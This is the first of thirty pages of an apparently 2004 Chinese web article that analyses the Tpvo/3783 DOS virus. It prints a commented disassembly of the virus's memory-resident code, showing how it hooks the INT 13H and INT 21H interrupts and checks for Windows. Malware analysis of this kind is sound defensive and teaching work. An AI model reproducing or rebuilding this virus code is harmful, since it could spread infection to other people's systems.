文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术防范措施Tpvo/3783 病毒的分析和防治
精品推荐
特别推荐
·分布式拒绝服务攻击(DDoS)原理及防范
·通过防火墙来堵住VPN安全漏洞
·针对DDOS部署有效防御措施
·专家谈企业防火墙的安全防护配置
·防火墙的实际功能差异鉴别方法
·教你如何正确设置帐户锁定选项
·分析称主动防御安全技术尚存技术缺陷
·保护用户计算机远离黑客骚扰九大策略
·三层交换机安全策略预防病毒
·详解IP地址盗用常用方法及防范
·计算机病毒防治常遇问题
·解读防火墙日志记录 防范网络攻击
·轻松方便 三招两式抵制IE的顽固病毒
·怎么样清除能突破主动防御的新型木马
·网络安全专家支招防范黑客攻击九大方法
·配置防火墙和Web代理客户的访问
·个人计算机防范黑客的九大绝招
·入侵检测 浅谈安全扫描软件的检测技术
·教你九招防范黑客的简单办法
·安全专家支招防范黑客攻击九大方法
热点TOP10
·局域网上网的安全防范与技巧
·无线攻防:破解WEP密钥过程全解
·网络安全专家支招防范黑客攻击九大方法
·保护用户计算机远离黑客骚扰九大策略
·专家谈企业防火墙的安全防护配置
·分析称主动防御安全技术尚存技术缺陷
·三层交换机安全策略预防病毒
·开启瑞星防火墙不能上网问题解决
·计算机病毒防治常遇问题
·轻松方便 三招两式抵制IE的顽固病毒
·怎么样清除能突破主动防御的新型木马
·教你如何正确设置帐户锁定选项
·应用程序访问权限完全攻略
·瑞星个人防火墙安装与使用详解
·端口大全及端口关闭方法
·百炼成钢-打磨你的Outpost防火墙
·SYN flood攻击的原理及其防御
·防御局域网攻击 ZT
·个人电脑防御黑客攻击的绝招
·Tpvo/3783 病毒的分析和防治

Tpvo/3783 病毒的分析和防治

日期:2004年6月30日 作者:清风网络学院 查看:[大字体 中字体 小字体]


; 文件驻留引入 INT 2A 代码部分
; 初始化时使用
;==========================================================================
F6C8:0351 60PUSHA
F6C8:0352 1EPUSHDS
F6C8:0353 06PUSHES
F6C8:0354 2ECS:
F6C8:0355 C606FF00EBMOV BYTE PTR [00FF],EB ;INT 13H
F6C8:035A 2ECS: ;不检测
F6C8:035B C60658053DMOV BYTE PTR [0558],3D ;INT 21H 不检测
F6C8:0360 B80016MOV AX,1600 ;WINDOWS 增强模式检验
F6C8:0363 CD2FINT 2F
F6C8:0365 0AC0ORAL,AL
F6C8:0367 7505JNZ 036E ;WINDOWS 运行转 036E
F6C8:0369 E881FECALL01ED ;随机生成 INT 13H 地址
F6C8:036C EB03JMP 0371
F6C8:036E E8B9FECALL022A ;随机生成 INT 13H 地址
F6C8:0371 B80013MOV AX,1300 ;取得原 INT 13H 地址
F6C8:0374 8BD3MOV DX,BX ;并设置新 INT 13H 地址
F6C8:0376 06PUSHES
F6C8:0377 1FPOP DS ;INT 2F 之 1300 功能
F6C8:0378 CD2FINT 2F ;入口ES:BX 及 DS:DX
F6C8:037A 2ECS: ;为新 INT 13H 地址
F6C8:037B 8916F800MOV [00F8],DX ;出口ES:BX 及 DS:DX
F6C8:037F 2ECS: ;为旧 INT 13H 地址
F6C8:0380 8C1EFA00MOV [00FA],DS
F6C8:0384 EB03JMP 0389 ;转截取 INT 21H (0389)
;==========================================================================
;BOOT 引导驻留引入 INT 2A 入口
F6C8:0386 60PUSHA
F6C8:0387 1EPUSHDS
F6C8:0388 06PUSHES
;==========================================================================
;截取 INT 21H 代码部分
F6C8:0389 B80312MOV AX,1203 ;取 MSDOS.SYS 数据段地址
F6C8:038C CD2FINT 2F ;返回段地址 = DS
F6C8:038E 8CD8MOV AX,DS
F6C8:0390 8CD6MOV SI,SS
F6C8:0392 2BF0SUB SI,AX
F6C8:0394 7403JZ0399 ;在 MSDOS.SYS 中执行
F6C8:0396 E99D00JMP 0436 ;转 0399, 否则退出
F6C8:0399 0EPUSHCS
F6C8:039A 1FPOP DS
F6C8:039B A33101MOV [0131],AX
F6C8:039E C606C00DEBMOV BYTE PTR [0DC0],EB
F6C8:03A3 C6060401EBMOV BYTE PTR [0104],EB
F6C8:03A8 C4063A04LES AX,[043A]
F6C8:03AC 8EDEMOV DS,SI
F6C8:03AE A3A800MOV [00A8],AX
F6C8:03B1 8C06AA00MOV [00AA],ES ;恢复原 INT 2A 中断向量
F6C8:03B5 8BECMOV BP,SP
F6C8:03B7 8E5E16MOV DS,[BP+16] ;调用代码段
F6C8:03BA 83FE80CMP SI,-80 ;为 INT 21 的代码段
F6C8:03BD 7777JA0436
F6C8:03BF ACLODSB
F6C8:03C0 3C2ECMP AL,2E ;找 2E 8B 9F xx xx
F6C8:03C2 75F6JNZ 03BA ;即 MOV BX,CS:[BX+xxxx]
F6C8:03C4 ADLODSW
F6C8:03C5 3D8B9FCMP AX,9F8B

上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] [27] [28] [29] [30] 下一页 




上一篇:Windows新漏洞将任意用户提升到SYSTEM级别的权限的方法

下一篇:Burglar 病毒的分析和防治

Tpvo/3783 病毒的分析和防治 相关文章:
·配置Catalyst交换端口分析器(SPAN)
·一次入侵过程的公开分析
·万能五笔2001注册码分析及暴力破解 上
·警惕高危木马病毒 随意下载病毒窃密码
·BT下载速度变慢原因解读及应对方法分析
·ORACLE常见错误代码的分析与解决之二
·电脑死机的故障分析
·统计分析Web服务器日志
·QQ号的木马病毒(Trojan/PSW.QQPass)_盗取QQ账号
·文晟扫描5. 0 之破解经过 算法分析
Tpvo/3783 病毒的分析和防治 相关软件:
·3D 动画与建模:人体的综合与分析技术
·Windows蠕虫病毒专杀定制工具 V0.0.6
·建设部监理师-案例分析录音16
·U盘病毒专杀工具(USBCleaner)V6.0 Build 20070812
·频谱分析仪V1.10
·属相分析大师 V1.0
·瑞星“墨菲(Trojan.Mofei)”病毒专杀工具 V1.4
·冲击波病毒专杀工具包 V 1.0
·瑞星“Zotob蠕虫(Worm.Zotob)”病毒专杀工具 V1.00
·“魔兽木马”病毒专杀 V3.0

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot